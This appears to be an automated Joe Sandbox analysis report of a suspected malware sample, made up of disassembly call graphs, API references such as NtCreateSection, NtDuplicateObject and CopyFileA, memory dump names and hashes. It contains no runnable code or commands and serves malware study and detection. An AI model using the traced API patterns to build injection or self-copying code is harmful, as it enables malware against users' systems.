                                                                                                                                                                                        • Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                        • Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447059353.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                                      • Opcode ID: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
                                                                                                                                                                                      • Instruction ID: f289286abcb0c8361d5bc883c0512fb430ce21eb2a0d87beead029bdd4c1ea53
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C11C2F1208204F7E7006A959D62E7A3669AB01714F304137BA43790F1D57D9913E76F
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 447 40193d-40197e 450 401981-4019a3 call 4011f5 Sleep call 401467 447->450 451 40196f-40197a 447->451 456 4019b2-4019f7 call 4011f5 450->456 457 4019a5-4019ad call 401558 450->457 451->450 457->456
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E
                                                                                                                                                                                        • Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                        • Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447059353.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                                      • Opcode ID: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
                                                                                                                                                                                      • Instruction ID: 515f5f5985279033342f6d13e0d75d2e799464d7355665022411b06cc3c0c42c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
                                                                                                                                                                                      • Instruction Fuzzy Hash: 991129F2608285EBD7005BA18DA2EA937659F01710F20057BF6037E0F2D53D9513EB1B
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 471 40196c-4019a3 call 4011f5 Sleep call 401467 477 4019b2-4019f7 call 4011f5 471->477 478 4019a5-4019ad call 401558 471->478 478->477
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E
                                                                                                                                                                                        • Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                        • Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447059353.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                                      • Opcode ID: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
                                                                                                                                                                                      • Instruction ID: 3e47f40c2c79a3419effdd93610d16f961f2ccd470e9348de27537ec9d0296a5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
                                                                                                                                                                                      • Instruction Fuzzy Hash: CA01F2B2208244EFCB005BE58CA1EAA3765AB05315F300133F603B90F2C93C8512EB6B
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447763126.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d80000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: .$GetProcAddress.$l
                                                                                                                                                                                      • API String ID: 0-2784972518
                                                                                                                                                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                      • Instruction ID: 9d161aee42b0abed303ff5aa5651cd11f41ae20b825f0027bc5e713653254f0d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                      • Instruction Fuzzy Hash: E3314AB6900609DFDB10DF99C880AAEBBF9FF48725F19404AD841A7310D771EA49CFA4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447763126.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d80000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                      • Instruction ID: 194ead901159a628181f825eb44f9653329cd22276f99499c8f77ff8fb7f40a2
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                      • Instruction Fuzzy Hash: B701A276A116048FDF21EF24C805BAB33E5FB86317F4584A5D90A97381E774AD49CB90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447086890.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_409000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                      • Instruction ID: 430cef0b442b72fba31a9525f370ff0910c3fca274e234c87a05adff5569907f
                                                                                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A11837280414ABBCF125EC5DC01CEE3F22FF09354F58852AFE1869170D23AC976AB85
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.447086890.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_409000_Ej3vSx3p8Y.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __calloc_crt
                                                                                                                                                                                      • String ID: OA
                                                                                                                                                                                      • API String ID: 3494438863-2973154622
                                                                                                                                                                                      • Opcode ID: 2ec572cf25af99296c658c09c73f6beb1abef7774fea2a279c057340c2d3aeee
                                                                                                                                                                                      • Instruction ID: 0025d3d3cfbf8316c97b985da842adb8b7d7327524e5e8db4dec2ef9f5205de7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ec572cf25af99296c658c09c73f6beb1abef7774fea2a279c057340c2d3aeee
                                                                                                                                                                                      • Instruction Fuzzy Hash: A31123327092004BE7284A1EBC517AB2395FB85328B34873BE914EA3C0E73CCC8246CC
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:3%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                      Signature Coverage:0.9%
                                                                                                                                                                                      Total number of Nodes:1511
                                                                                                                                                                                      Total number of Limit Nodes:19
                                                                                                                                                                                      execution_graph 19672 1c9d3c 19673 1c9d4d 19672->19673 19674 1c9d61 19672->19674 19673->19674 19675 1ca135 19673->19675 19708 1d5760 19674->19708 19772 1db98e 19675->19772 19677 1ca13a 19678 1db98e 25 API calls 19677->19678 19682 1ca13f 19678->19682 19680 1c9dee 19722 1c2be0 19680->19722 19685 1ca158 CopyFileA 19682->19685 19687 1c5000 68 API calls 19685->19687 19686 1c9e15 19744 1d5c10 19686->19744 19689 1ca16a 19687->19689 19693 1d5720 27 API calls 19689->19693 19703 1ca1b1 19689->19703 19690 1c9e2a GetModuleFileNameA 19697 1c9f17 19690->19697 19691 1ca1c4 19695 1db98e 25 API calls 19691->19695 19692 1da74f 23 API calls 19692->19691 19696 1ca183 19693->19696 19698 1ca1c9 19695->19698 19699 1d5760 27 API calls 19696->19699 19697->19697 19752 1d5ac0 19697->19752 19700 1ca19e 19699->19700 19702 1d5720 27 API calls 19700->19702 19702->19703 19703->19691 19703->19692 19704 1c9f33 19704->19691 19705 1ca111 19704->19705 19765 1d6cc2 19705->19765 19707 1ca131 19709 1d5786 19708->19709 19710 1d578d 19709->19710 19711 1d57e1 19709->19711 19712 1d57c2 19709->19712 19710->19680 19715 1d70b4 27 API calls 19711->19715 19719 1d57d6 __wsopen_s 19711->19719 19713 1d5819 19712->19713 19714 1d57c9 19712->19714 19791 1c2150 19713->19791 19777 1d70b4 19714->19777 19715->19719 19718 1d57cf 19718->19719 19720 1db98e 25 API calls 19718->19720 19719->19680 19721 1d5823 19720->19721 19985 1c29b0 19722->19985 19728 1c2c4b 19729 1c2cfb 19728->19729 19730 1c2cd5 19728->19730 19732 1db98e 25 API calls 19729->19732 19731 1d6cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19730->19731 19733 1c2cf7 19731->19733 19734 1c2d00 19732->19734 19735 1d5f90 19733->19735 19736 1d5ff0 19735->19736 19736->19736 20282 1d6720 19736->20282 19738 1d6009 19740 1d6024 __InternalCxxFrameHandler 19738->19740 20294 1d6460 19738->20294 19741 1d6460 27 API calls 19740->19741 19743 1d6079 __InternalCxxFrameHandler 19740->19743 19742 1d60c1 19741->19742 19742->19686 19743->19686 19745 1d5c38 19744->19745 19746 1d5c82 19744->19746 19745->19746 19747 1d5c41 19745->19747 19749 1d5c91 __InternalCxxFrameHandler 19746->19749 19750 1d6460 27 API calls 19746->19750 19748 1d68c0 27 API calls 19747->19748 19751 1d5c4a 19748->19751 19749->19690 19750->19749 19751->19690 19754 1d5ade __InternalCxxFrameHandler 19752->19754 19755 1d5b04 19752->19755 19753 1d5bee 19756 1c2150 Concurrency::cancel_current_task 27 API calls 19753->19756 19754->19704 19755->19753 19757 1d5b7d 19755->19757 19758 1d5b58 19755->19758 19759 1d5bf8 19756->19759 19761 1d70b4 27 API calls 19757->19761 19763 1d5b69 __wsopen_s 19757->19763 19758->19753 19760 1d70b4 27 API calls 19758->19760 19760->19763 19761->19763 19762 1db98e 25 API calls 19762->19753 19763->19762 19764 1d5bd0 19763->19764 19764->19704 19766 1d6ccd IsProcessorFeaturePresent 19765->19766 19767 1d6ccb 19765->19767 19769 1d6ef4 19766->19769 19767->19707 20307 1d6eb8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19769->20307 19771 1d6fd7 19771->19707 19773 1db91a __wsopen_s 25 API calls 19772->19773 19774 1db99d 19773->19774 19775 1db9ab __wsopen_s 11 API calls 19774->19775 19776 1db9aa 19775->19776 19779 1d70b9 19777->19779 19780 1d70d3 19779->19780 19782 1d70d5 19779->19782 19808 1db9f9 19779->19808 19811 1db9df 19779->19811 19780->19718 19783 1d70df 19782->19783 19784 1c2150 Concurrency::cancel_current_task 19782->19784 19786 1d8133 Concurrency::cancel_current_task RaiseException 19783->19786 19797 1d8133 19784->19797 19788 1d77ac 19786->19788 19787 1c216c 19800 1d7ef8 19787->19800 19792 1c215e Concurrency::cancel_current_task 19791->19792 19793 1d8133 Concurrency::cancel_current_task RaiseException 19792->19793 19794 1c216c 19793->19794 19795 1d7ef8 ___std_exception_copy 26 API calls 19794->19795 19796 1c2193 19795->19796 19796->19718 19798 1d817d RaiseException 19797->19798 19799 1d814d 19797->19799 19798->19787 19799->19798 19801 1c2193 19800->19801 19802 1d7f05 19800->19802 19801->19718 19802->19801 19803 1db9df ___std_exception_copy 15 API calls 19802->19803 19804 1d7f22 19803->19804 19805 1d7f32 19804->19805 19818 1dca9c 19804->19818 19827 1db794 19805->19827 19974 1dba26 19808->19974 19815 1dd7ea _unexpected 19811->19815 19812 1dd828 19813 1db4a2 __dosmaperr 14 API calls 19812->19813 19816 1dd826 19813->19816 19814 1dd813 RtlAllocateHeap 19814->19815 19814->19816 19815->19812 19815->19814 19817 1db9f9 _unexpected 2 API calls 19815->19817 19816->19779 19817->19815 19819 1dcab7 19818->19819 19820 1dcaa9 19818->19820 19830 1db4a2 19819->19830 19820->19819 19825 1dcace 19820->19825 19822 1dcabf 19833 1db97e 19822->19833 19824 1dcac9 19824->19805 19825->19824 19826 1db4a2 __dosmaperr 14 API calls 19825->19826 19826->19822 19828 1dd301 _free 14 API calls 19827->19828 19829 1db7ac 19828->19829 19829->19801 19836 1ddd49 GetLastError 19830->19836 19832 1db4a7 19832->19822 19956 1db91a 19833->19956 19835 1db98a 19835->19824 19837 1ddd66 19836->19837 19838 1ddd60 19836->19838 19858 1ddd6c SetLastError 19837->19858 19864 1de172 19837->19864 19859 1de133 19838->19859 19844 1ddd94 19845 1ddd9c 19844->19845 19846 1dddb3 19844->19846 19847 1de172 _unexpected 6 API calls 19845->19847 19848 1de172 _unexpected 6 API calls 19846->19848 19849 1dddaa 19847->19849 19850 1dddbf 19848->19850 19876 1dd301 19849->19876 19851 1dddd4 19850->19851 19852 1dddc3 19850->19852 19882 1dda20 19851->19882 19854 1de172 _unexpected 6 API calls 19852->19854 19854->19849 19857 1dd301 _free 12 API calls 19857->19858 19858->19832 19887 1ddf73 19859->19887 19861 1de14f 19862 1de158 19861->19862 19863 1de16a TlsGetValue 19861->19863 19862->19837 19865 1ddf73 _unexpected 5 API calls 19864->19865 19866 1de18e 19865->19866 19867 1de1ac TlsSetValue 19866->19867 19868 1ddd84 19866->19868 19868->19858 19869 1df5d6 19868->19869 19874 1df5e3 _unexpected 19869->19874 19870 1df623 19873 1db4a2 __dosmaperr 13 API calls 19870->19873 19871 1df60e HeapAlloc 19872 1df621 19871->19872 19871->19874 19872->19844 19873->19872 19874->19870 19874->19871 19875 1db9f9 _unexpected 2 API calls 19874->19875 19875->19874 19877 1dd30c HeapFree 19876->19877 19878 1dd335 __dosmaperr 19876->19878 19877->19878 19879 1dd321 19877->19879 19878->19858 19880 1db4a2 __dosmaperr 12 API calls 19879->19880 19881 1dd327 GetLastError 19880->19881 19881->19878 19900 1dd8b4 19882->19900 19888 1ddfa1 19887->19888 19892 1ddf9d _unexpected 19887->19892 19888->19892 19893 1ddeac 19888->19893 19891 1ddfbb GetProcAddress 19891->19892 19892->19861 19898 1ddebd ___vcrt_FlsFree 19893->19898 19894 1ddedb LoadLibraryExW 19895 1ddef6 GetLastError 19894->19895 19894->19898 19895->19898 19896 1ddf51 FreeLibrary 19896->19898 19897 1ddf68 19897->19891 19897->19892 19898->19894 19898->19896 19898->19897 19899 1ddf29 LoadLibraryExW 19898->19899 19899->19898 19901 1dd8c0 CallCatchBlock 19900->19901 19914 1dcc03 EnterCriticalSection 19901->19914 19903 1dd8ca 19915 1dd8fa 19903->19915 19906 1dd9c6 19907 1dd9d2 CallCatchBlock 19906->19907 19919 1dcc03 EnterCriticalSection 19907->19919 19909 1dd9dc 19920 1ddba7 19909->19920 19911 1dd9f4 19924 1dda14 19911->19924 19914->19903 19918 1dcc4b LeaveCriticalSection 19915->19918 19917 1dd8e8 19917->19906 19918->19917 19919->19909 19921 1ddbdd __fassign 19920->19921 19922 1ddbb6 __fassign 19920->19922 19921->19911 19922->19921 19927 1e1373 19922->19927 19955 1dcc4b LeaveCriticalSection 19924->19955 19926 1dda02 19926->19857 19928 1e13f3 19927->19928 19930 1e1389 19927->19930 19931 1dd301 _free 14 API calls 19928->19931 19954 1e1441 19928->19954 19929 1e14e4 __fassign 14 API calls 19949 1e144f 19929->19949 19930->19928 19935 1dd301 _free 14 API calls 19930->19935 19950 1e13bc 19930->19950 19932 1e1415 19931->19932 19934 1dd301 _free 14 API calls 19932->19934 19933 1e13de 19937 1dd301 _free 14 API calls 19933->19937 19936 1e1428 19934->19936 19940 1e13b1 19935->19940 19942 1dd301 _free 14 API calls 19936->19942 19938 1e13e8 19937->19938 19943 1dd301 _free 14 API calls 19938->19943 19939 1e14af 19944 1dd301 _free 14 API calls 19939->19944 19945 1e0f50 ___free_lconv_mon 14 API calls 19940->19945 19941 1dd301 _free 14 API calls 19946 1e13d3 19941->19946 19947 1e1436 19942->19947 19943->19928 19948 1e14b5 19944->19948 19945->19950 19951 1e104e __fassign 14 API calls 19946->19951 19952 1dd301 _free 14 API calls 19947->19952 19948->19921 19949->19939 19953 1dd301 14 API calls _free 19949->19953 19950->19933 19950->19941 19951->19933 19952->19954 19953->19949 19954->19929 19955->19926 19957 1ddd49 __dosmaperr 14 API calls 19956->19957 19958 1db925 19957->19958 19960 1db933 19958->19960 19964 1db9ab IsProcessorFeaturePresent 19958->19964 19960->19835 19961 1db97d 19962 1db91a __wsopen_s 25 API calls 19961->19962 19963 1db98a 19962->19963 19963->19835 19965 1db9b7 19964->19965 19968 1db7d2 19965->19968 19969 1db7ee ___scrt_fastfail 19968->19969 19970 1db81a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19969->19970 19971 1db8eb ___scrt_fastfail 19970->19971 19972 1d6cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19971->19972 19973 1db909 GetCurrentProcess TerminateProcess 19972->19973 19973->19961 19975 1dba32 CallCatchBlock 19974->19975 19980 1dcc03 EnterCriticalSection 19975->19980 19977 1dba3d 19981 1dba79 19977->19981 19980->19977 19984 1dcc4b LeaveCriticalSection 19981->19984 19983 1dba04 19983->19779 19984->19983 20005 1d5980 19985->20005 19987 1c29da 19988 1c2a50 19987->19988 19989 1d5980 27 API calls 19988->19989 19992 1c2a84 19989->19992 19990 1c2bb6 19993 1c26d0 19990->19993 19992->19990 20018 1dac50 19992->20018 19994 1d70b4 27 API calls 19993->19994 20004 1c2770 19994->20004 19995 1c2956 19996 1c297c 19995->19996 19998 1c29a6 19995->19998 19997 1d6cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19996->19997 19999 1c299f 19997->19999 20000 1db98e 25 API calls 19998->20000 19999->19728 20002 1c29ab 20000->20002 20001 1d5ac0 27 API calls 20001->20004 20004->19995 20004->19998 20004->20001 20261 1d68c0 20004->20261 20007 1d5998 ___scrt_fastfail 20005->20007 20008 1d59bf 20005->20008 20006 1d5aa8 20009 1c2150 Concurrency::cancel_current_task 27 API calls 20006->20009 20007->19987 20008->20006 20010 1d5a38 20008->20010 20011 1d5a13 20008->20011 20012 1d5ab2 20009->20012 20013 1d70b4 27 API calls 20010->20013 20016 1d5a24 ___scrt_fastfail 20010->20016 20011->20006 20014 1d70b4 27 API calls 20011->20014 20013->20016 20014->20016 20015 1db98e 25 API calls 20015->20006 20016->20015 20017 1d5a8a 20016->20017 20017->19987 20019 1dac6c __fassign 20018->20019 20020 1dac5e 20018->20020 20019->19992 20023 1dabc3 20020->20023 20028 1da9fd 20023->20028 20027 1dabe7 20027->19992 20029 1daa1d 20028->20029 20030 1daa14 20028->20030 20029->20030 20042 1ddbf2 GetLastError 20029->20042 20036 1dabfc 20030->20036 20037 1dac39 20036->20037 20038 1dac09 20036->20038 20227 1de370 20037->20227 20041 1dac18 __fassign 20038->20041 20220 1de394 20038->20220 20041->20027 20043 1ddc09 20042->20043 20044 1ddc0f 20042->20044 20046 1de133 _unexpected 6 API calls 20043->20046 20045 1de172 _unexpected 6 API calls 20044->20045 20068 1ddc15 SetLastError 20044->20068 20047 1ddc2d 20045->20047 20046->20044 20048 1df5d6 _unexpected 14 API calls 20047->20048 20047->20068 20049 1ddc3d 20048->20049 20051 1ddc5c 20049->20051 20052 1ddc45 20049->20052 20057 1de172 _unexpected 6 API calls 20051->20057 20055 1de172 _unexpected 6 API calls 20052->20055 20053 1ddca9 20077 1dca58 20053->20077 20054 1daa3d 20069 1de2ee 20054->20069 20058 1ddc53 20055->20058 20060 1ddc68 20057->20060 20064 1dd301 _free 14 API calls 20058->20064 20061 1ddc7d 20060->20061 20062 1ddc6c 20060->20062 20063 1dda20 _unexpected 14 API calls 20061->20063 20065 1de172 _unexpected 6 API calls 20062->20065 20066 1ddc88 20063->20066 20064->20068 20065->20058 20067 1dd301 _free 14 API calls 20066->20067 20067->20068 20068->20053 20068->20054 20070 1daa53 20069->20070 20071 1de301 20069->20071 20073 1de31b 20070->20073 20071->20070 20177 1e15bf 20071->20177 20074 1de32e 20073->20074 20075 1de343 20073->20075 20074->20075 20199 1e03ae 20074->20199 20075->20030 20088 1e0ce2 20077->20088 20080 1dca68 20082 1dca91 20080->20082 20083 1dca72 IsProcessorFeaturePresent 20080->20083 20118 1da713 20082->20118 20084 1dca7e 20083->20084 20086 1db7d2 IsInExceptionSpec 8 API calls 20084->20086 20086->20082 20121 1e0c14 20088->20121 20091 1e0d30 20092 1e0d3c CallCatchBlock 20091->20092 20093 1ddd49 __dosmaperr 14 API calls 20092->20093 20096 1e0d69 IsInExceptionSpec 20092->20096 20098 1e0d63 IsInExceptionSpec 20092->20098 20093->20098 20094 1e0dae 20095 1db4a2 __dosmaperr 14 API calls 20094->20095 20097 1e0db3 20095->20097 20101 1e0dda 20096->20101 20131 1dcc03 EnterCriticalSection 20096->20131 20099 1db97e __wsopen_s 25 API calls 20097->20099 20098->20094 20098->20096 20117 1e0d98 20098->20117 20099->20117 20103 1e0f17 20101->20103 20104 1e0e22 20101->20104 20114 1e0e4d 20101->20114 20106 1e0f22 20103->20106 20139 1dcc4b LeaveCriticalSection 20103->20139 20104->20114 20132 1e0d27 20104->20132 20107 1da713 IsInExceptionSpec 23 API calls 20106->20107 20109 1e0f2a 20107->20109 20111 1ddbf2 _unexpected 37 API calls 20115 1e0ea1 20111->20115 20113 1e0d27 IsInExceptionSpec 37 API calls 20113->20114 20135 1e0ec3 20114->20135 20116 1ddbf2 _unexpected 37 API calls 20115->20116 20115->20117 20116->20117 20117->20080 20141 1da5ed 20118->20141 20122 1e0c20 CallCatchBlock 20121->20122 20127 1dcc03 EnterCriticalSection 20122->20127 20124 1e0c2e 20128 1e0c6c 20124->20128 20127->20124 20129 1dcc4b IsInExceptionSpec LeaveCriticalSection 20128->20129 20130 1dca5d 20129->20130 20130->20080 20130->20091 20131->20101 20133 1ddbf2 _unexpected 37 API calls 20132->20133 20134 1e0d2c 20133->20134 20134->20113 20136 1e0ec9 20135->20136 20137 1e0e92 20135->20137 20140 1dcc4b LeaveCriticalSection 20136->20140 20137->20111 20137->20115 20137->20117 20139->20106 20140->20137 20142 1da60d 20141->20142 20143 1da5fb 20141->20143 20153 1da494 20142->20153 20169 1d76e2 GetModuleHandleW 20143->20169 20148 1da646 20152 1da650 20154 1da4a0 CallCatchBlock 20153->20154 20155 1dcc03 IsInExceptionSpec EnterCriticalSection 20154->20155 20156 1da4aa 20155->20156 20157 1da500 IsInExceptionSpec 14 API calls 20156->20157 20158 1da4b7 20157->20158 20159 1da4d5 IsInExceptionSpec LeaveCriticalSection 20158->20159 20160 1da4c3 20159->20160 20160->20148 20161 1da651 20160->20161 20162 1dcc62 IsInExceptionSpec 6 API calls 20161->20162 20163 1da65b 20162->20163 20164 1da680 20163->20164 20165 1da660 GetPEB 20163->20165 20166 1da693 IsInExceptionSpec GetModuleHandleExW GetProcAddress FreeLibrary 20164->20166 20165->20164 20167 1da670 GetCurrentProcess TerminateProcess 20165->20167 20168 1da688 ExitProcess 20166->20168 20167->20164 20170 1d76ee 20169->20170 20170->20142 20171 1da693 GetModuleHandleExW 20170->20171 20172 1da6d5 20171->20172 20173 1da6b2 GetProcAddress 20171->20173 20174 1da6db FreeLibrary 20172->20174 20175 1da60c 20172->20175 20176 1da6c7 20173->20176 20174->20175 20175->20142 20176->20172 20178 1e15cb CallCatchBlock 20177->20178 20179 1ddbf2 _unexpected 37 API calls 20178->20179 20180 1e15d4 20179->20180 20187 1e161a 20180->20187 20190 1dcc03 EnterCriticalSection 20180->20190 20182 1e15f2 20191 1e1640 20182->20191 20187->20070 20188 1dca58 IsInExceptionSpec 37 API calls 20189 1e163f 20188->20189 20190->20182 20192 1e164e __fassign 20191->20192 20194 1e1603 20191->20194 20193 1e1373 __fassign 14 API calls 20192->20193 20192->20194 20193->20194 20195 1e161f 20194->20195 20198 1dcc4b LeaveCriticalSection 20195->20198 20197 1e1616 20197->20187 20197->20188 20198->20197 20200 1ddbf2 _unexpected 37 API calls 20199->20200 20201 1e03b8 20200->20201 20204 1e02c6 20201->20204 20205 1e02d2 CallCatchBlock 20204->20205 20207 1e02ec 20205->20207 20215 1dcc03 EnterCriticalSection 20205->20215 20209 1e02f3 20207->20209 20211 1dca58 IsInExceptionSpec 37 API calls 20207->20211 20208 1e0328 20216 1e0345 20208->20216 20209->20075 20213 1e0365 20211->20213 20212 1e02fc 20212->20208 20214 1dd301 _free 14 API calls 20212->20214 20214->20208 20215->20212 20219 1dcc4b LeaveCriticalSection 20216->20219 20218 1e034c 20218->20207 20219->20218 20221 1da9fd __fassign 37 API calls 20220->20221 20222 1de3b1 20221->20222 20224 1de3c1 20222->20224 20232 1e11d3 20222->20232 20225 1d6cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 20224->20225 20226 1de45d 20225->20226 20226->20041 20228 1ddbf2 _unexpected 37 API calls 20227->20228 20229 1de37b 20228->20229 20230 1de2ee __fassign 37 API calls 20229->20230 20231 1de38b 20230->20231 20231->20041 20233 1da9fd __fassign 37 API calls 20232->20233 20234 1e11f3 20233->20234 20247 1dd838 20234->20247 20236 1e12b1 20237 1d6cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 20236->20237 20240 1e12d4 20237->20240 20238 1e1220 20238->20236 20243 1e1246 __alloca_probe_16 ___scrt_fastfail 20238->20243 20250 1dd7ea 20238->20250 20240->20224 20241 1e12ab 20257 1e12d6 20241->20257 20243->20241 20244 1dd838 __fassign MultiByteToWideChar 20243->20244 20245 1e1294 20244->20245 20245->20241 20246 1e129b GetStringTypeW 20245->20246 20246->20241 20248 1dd849 MultiByteToWideChar 20247->20248 20248->20238 20251 1dd828 20250->20251 20256 1dd7f8 _unexpected 20250->20256 20252 1db4a2 __dosmaperr 14 API calls 20251->20252 20254 1dd826 20252->20254 20253 1dd813 RtlAllocateHeap 20253->20254 20253->20256 20254->20243 20255 1db9f9 _unexpected 2 API calls 20255->20256 20256->20251 20256->20253 20256->20255 20258 1e12f3 20257->20258 20259 1e12e2 20257->20259 20258->20236 20259->20258 20260 1dd301 _free 14 API calls 20259->20260 